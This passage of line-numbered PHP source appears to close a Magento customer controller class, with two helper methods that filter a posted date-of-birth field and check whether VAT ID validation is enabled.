  984.  
  985. /**
  986. * Filtering posted data. Converting localized data if needed
  987. *
  988. * @param array
  989. * @return array
  990. */
  991. protected function _filterPostData($data)
  992. {
  993. $data = $this->_filterDates($data, array('dob'));
  994. return $data;
  995. }
  996.  
  997. /**
  998. * Check whether VAT ID validation is enabled
  999. *
  1000. * @param Mage_Core_Model_Store|string|int $store
  1001. * @return bool
  1002. */
  1003. protected function _isVatValidationEnabled($store = null)
  1004. {
  1005. return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1006. }
  1007. }